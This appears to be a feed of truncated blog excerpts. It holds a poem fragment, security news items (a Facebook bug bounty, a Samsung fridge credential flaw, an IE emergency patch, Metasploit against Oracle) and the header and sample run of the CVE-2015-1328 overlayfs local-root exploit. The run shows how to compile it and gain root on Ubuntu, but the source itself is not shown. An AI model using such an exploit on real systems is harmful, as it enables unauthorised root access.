Watch her garden grow Mister,
blue lakes, blue skies, blueberry pie;
Mister always kissin’ her pink rose,
Mister doesn’t pardon her red rose,
too much water, too much sun, too much fun; 6 more words
It’s the third bug of the year for Facebook bounty hunter Laxman Muthiyah.
At the start of 2015 he noticed that if you could view a photo album on Facebook, you could probably… 622 more words
# Exploit Title: ofs.c - overlayfs local root in ubuntu # Date: 2015-06-15 # Exploit Author: rebel # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15) # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04 # CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html) *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* CVE-2015-1328 / ofs.c overlayfs incorrect permission handling + FS_USERNS_MOUNT user@ubuntu-server-1504:~$ uname -a Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux user@ubuntu-server-1504:~$ gcc ofs.c -o ofs user@ubuntu-server-1504:~$ id uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev) user@ubuntu-server-1504:~$ ./ofs spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # id uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user) greets to beist & kaliman 2015-05-24 … 689 more words
Penetration testers have discovered an exploit that could potentially steal Gmail credentials of a user whose information is available in a Samsung smart fridge.
Security researchers have uncovered a man-in-the-middle (MiTM) vulnerability that leaves Samsung smart refrigerators open to an exploit that allows an attacker to steal the owner’s Gmail credentials, reports… 377 more words
Microsoft has issued an emergency update to patch a critical vulnerability that affects all supported versions of Internet Explorer. If you haven’t already installed the fix, it’s recommended that you do so ASAP as hackers are said to be actively exploiting it. 224 more words
Bingo! I’ve done it! I’ve got Metaspoit working against an Oracle database. And in this blogpost I’ll explain how you can do it too.